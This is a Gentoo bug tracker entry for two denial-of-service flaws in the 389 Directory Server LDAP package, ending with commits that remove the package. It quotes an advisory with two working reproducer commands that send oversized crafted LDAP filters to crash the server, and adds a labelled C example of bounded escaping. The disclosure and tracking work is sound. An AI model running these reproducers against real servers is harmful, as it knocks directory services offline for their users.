Bug 655176 (CVE-2018-1089, CVE-2019-3883) - net-nds/389-ds-base: Multiple vulnerabilities (CVE-2018-1089,CVE-2019-3883)
Summary: net-nds/389-ds-base: Multiple vulnerabilities (CVE-2018-1089,CVE-2019-3883)
Status: RESOLVED FIXED
Alias: CVE-2018-1089, CVE-2019-3883
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities
Hardware: All Linux
Importance: Normal trivial
Assignee: Gentoo Security
URL: http://www.openwall.com/lists/oss-sec...
Whiteboard: ~3 [noglsa upstream/ebuild cve]
Keywords: PullRequest
Depends on: 731296
Blocks:
Reported: 2018-05-07 15:53 UTC by Agostino Sarubbo
Modified: 2020-07-26 05:51 UTC

Description Agostino Sarubbo gentoo-dev 2018-05-07 15:53:08 UTC
From ${URL} :

This is to disclose the following flaw, CVE-2018-1089 :

389-ds-base, a.k.a 389 Directory Server, https://pagure.io/389-ds-base/,
is a highly usable, fully featured, reliable and secure LDAP server
implementation. It handles many of the largest LDAP deployments in the
world.

389-ds server did not properly handle characters needed to be escaped in
its query filter. This could result in buffer overflows, from the heap
or the stack, on larger filters.  An unauthenticated attacker could send
a specially crafted LDAP request and crash the server. RCE has not been
demonstrated at this time.

Red Hat would like to thank Greg Kubok for alerting us of the issue.


Reproducer1 :
[root@server1 ~]# payload=$(printf '.*$%.0s' {1..1000})
[root@server1 ~]# ldapsearch -h localhost -p 389 -x -b "dc=blah"
"(&(|(telephoneNumber=*${payload}*)(uid=*${payload}*)(title=*${payload}*)(sn=*${payload}*)(ou=*${payload}*)(givenName=*${payload}*))(objectClass=posixaccount))"
"telephoneNumber sshpubkeyfp ipaSshPubKey uid krbCanonicalName title
loginShell uidNumber gidNumber sn homeDirectory mail krbPrincipalName
givenName nsAccountLock"

Reproducer2:
[root@server1 ~]# perl -e 'print ".*\$" x (1400)' | ldapsearch -x -f-
"(&(uid=%s)(objectClass=posixaccount))"



@maintainer(s): since the package or the affected version has never been marked as stable, we don't need to stabilize it. After the bump, please remove the affected versions from the tree.
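
The bug class the advisory describes (escaping that lengthens a filter value, written into a buffer sized for the unescaped input), shown as a bounded escape routine. This is an added illustration, not 389-ds-base code; the function names and the set of escaped characters are assumptions chosen to cover the `.*$` sequence in the reproducers.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical set of characters that receive a backslash prefix.
 * Assumption for this example, not taken from the 389-ds-base source. */
static int needs_escape(char c)
{
    return c != '\0' && strchr(".*$^[]()\\+?{}|", c) != NULL;
}

/* Length of the escaped form, excluding the terminating NUL.
 * Worst case every byte is escaped, so this can reach 2 * strlen(in). */
size_t escaped_len(const char *in)
{
    size_t n = 0;
    for (; *in; in++)
        n += needs_escape(*in) ? 2 : 1;
    return n;
}

/* Bounded escape: writes at most outsz bytes, NUL included.
 * Returns 0 on success, -1 if the escaped form does not fit. On failure
 * out holds an empty string, so a truncated filter is never used.
 * A buffer of strlen(in) + 1 bytes is NOT enough once escaping applies. */
int escape_filter_value(const char *in, char *out, size_t outsz)
{
    size_t need = escaped_len(in);
    size_t o = 0;

    if (outsz == 0)
        return -1;
    out[0] = '\0';
    if (need >= outsz)      /* need bytes plus the NUL must fit */
        return -1;
    for (; *in; in++) {
        if (needs_escape(*in))
            out[o++] = '\\';
        out[o++] = *in;
    }
    out[o] = '\0';
    return 0;
}
```

The size check is computed from the escaped length before any byte is written, which is the step an input-length-sized buffer skips.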
Comment 1 Jonas Stein gentoo-dev 2019-06-02 12:44:55 UTC
The package has no maintainer any more.
Comment 2 GLSAMaker/CVETool Bot gentoo-dev 2020-04-16 23:09:22 UTC
CVE-2019-3883 (https://nvd.nist.gov/vuln/detail/CVE-2019-3883):
  In 389-ds-base up to version 1.4.1.2, requests are handled by worker
  threads. Each socket will be waited on by the worker for at most
  'ioblocktimeout' seconds. However this timeout applies only for un-encrypted
  requests. Connections using SSL/TLS are not taking this timeout into account
  during reads, and may hang longer. An unauthenticated attacker could
  repeatedly create hanging LDAP requests to hang all the workers, resulting
  in a Denial of Service.
Comment 3 Larry the Git Cow gentoo-dev 2020-06-04 19:14:55 UTC
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=66a48ca5d52d4699c4ef38209dfcad8ebdd149aa

commit 66a48ca5d52d4699c4ef38209dfcad8ebdd149aa
Author:     Sam James (sam_c) <sam@cmpct.info>
AuthorDate: 2020-06-04 18:24:47 +0000
Commit:     Thomas Deutschmann <whissi@gentoo.org>
CommitDate: 2020-06-04 19:14:36 +0000

    net-nds/389-ds-base, dev-libs/389-adminutil: Last rites
    
    Bug: https://bugs.gentoo.org/655176
    Bug: https://bugs.gentoo.org/701812
    Signed-off-by: Sam James (sam_c) <sam@cmpct.info>
    Signed-off-by: Thomas Deutschmann <whissi@gentoo.org>

 profiles/package.mask | 10 ++++++++--
 1 file changed, 8 insertions(+), 2 deletions(-)
Comment 4 Larry the Git Cow gentoo-dev 2020-07-13 04:53:09 UTC
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=7414f8c33bb75cd9a4f6a61040886852fcf2afe1

commit 7414f8c33bb75cd9a4f6a61040886852fcf2afe1
Author:     Michał Górny <mgorny@gentoo.org>
AuthorDate: 2020-07-13 04:52:07 +0000
Commit:     Michał Górny <mgorny@gentoo.org>
CommitDate: 2020-07-13 04:52:31 +0000

    dev-libs/svrcore: Remove last-rited pkg
    
    Bug: https://bugs.gentoo.org/655176
    Bug: https://bugs.gentoo.org/701812
    Signed-off-by: Michał Górny <mgorny@gentoo.org>

 dev-libs/svrcore/Manifest                         |   2 -
 dev-libs/svrcore/files/svrcore-4.0.4-gentoo.patch | 100 ----------------------
 dev-libs/svrcore/files/svrcore-4.1-gentoo.patch   | 100 ----------------------
 dev-libs/svrcore/metadata.xml                     |   5 --
 dev-libs/svrcore/svrcore-4.0.4-r1.ebuild          |  40 ---------
 dev-libs/svrcore/svrcore-4.1.2.ebuild             |  35 --------
 profiles/package.mask                             |   6 --
 7 files changed, 288 deletions(-)

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=aef3f76fb5607ea9fcecd97c192a0ab06d224737

commit aef3f76fb5607ea9fcecd97c192a0ab06d224737
Author:     Michał Górny <mgorny@gentoo.org>
AuthorDate: 2020-07-13 04:51:55 +0000
Commit:     Michał Górny <mgorny@gentoo.org>
CommitDate: 2020-07-13 04:52:27 +0000

    dev-libs/389-adminutil: Remove last-rited pkg
    
    Bug: https://bugs.gentoo.org/655176
    Bug: https://bugs.gentoo.org/701812
    Signed-off-by: Michał Górny <mgorny@gentoo.org>

 dev-libs/389-adminutil/389-adminutil-1.1.15.ebuild | 46 ----------------------
 dev-libs/389-adminutil/Manifest                    |  1 -
 dev-libs/389-adminutil/metadata.xml                |  5 ---
 profiles/package.mask                              |  2 -
 4 files changed, 54 deletions(-)

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=eb6602276b3003bcdafd619a28ac6f163f52fb30

commit eb6602276b3003bcdafd619a28ac6f163f52fb30
Author:     Michał Górny <mgorny@gentoo.org>
AuthorDate: 2020-07-13 04:50:40 +0000
Commit:     Michał Górny <mgorny@gentoo.org>
CommitDate: 2020-07-13 04:52:23 +0000

    net-nds/389-ds-base: Remove last-rited pkg
    
    Bug: https://bugs.gentoo.org/655176
    Bug: https://bugs.gentoo.org/701812
    Signed-off-by: Michał Górny <mgorny@gentoo.org>

 net-nds/389-ds-base/389-ds-base-1.3.6.8-r1.ebuild  | 126 -------
 net-nds/389-ds-base/389-ds-base-9999.ebuild        | 133 --------
 net-nds/389-ds-base/Manifest                       |   1 -
 ...-base-1.3.6-backport-invalid-password-mig.patch | 376 ---------------------
 net-nds/389-ds-base/files/389-ds-snmp.initd        |  44 ---
 net-nds/389-ds-base/files/389-ds.initd-r1          |  90 -----
 net-nds/389-ds-base/metadata.xml                   |  23 --
 7 files changed, 793 deletions(-)
Comment 5 Sam James archtester gentoo-dev Security 2020-07-26 05:51:35 UTC
~ package so noglsa, closing.